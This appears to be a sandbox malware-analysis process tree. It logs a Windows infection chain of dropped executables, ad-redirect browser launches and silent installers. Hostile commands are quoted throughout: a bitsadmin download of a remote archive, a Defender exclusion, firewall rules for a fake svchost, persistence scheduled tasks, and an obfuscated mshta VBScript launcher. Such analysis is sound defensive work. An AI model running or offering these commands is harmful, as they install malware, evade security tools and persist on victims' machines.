C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3312 /prefetch:213⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1272 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1108 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5816 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0xfc,0x138,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe"C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exeC:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet13⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive & exit12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exeC:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exeC:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exeC:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=65413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11a9d578c6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a9d578c6.exeMon11a9d578c6.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11c267c861c0984e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exeMon11c267c861c0984e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT ("wscRiPT.shELl" ). Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF """" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" ) do taskkill /IM ""%~nXi"" /f" , 0 , tRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF "" == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe" ) do taskkill /IM "%~nXi" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE..\f44LQm.eXE /PsV~zGbxsNCn0ht28⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT ("wscRiPT.shELl" ). Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF ""/PsV~zGbxsNCn0ht2 "" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" ) do taskkill /IM ""%~nXi"" /f" , 0 , tRUE ) )9⤵
-
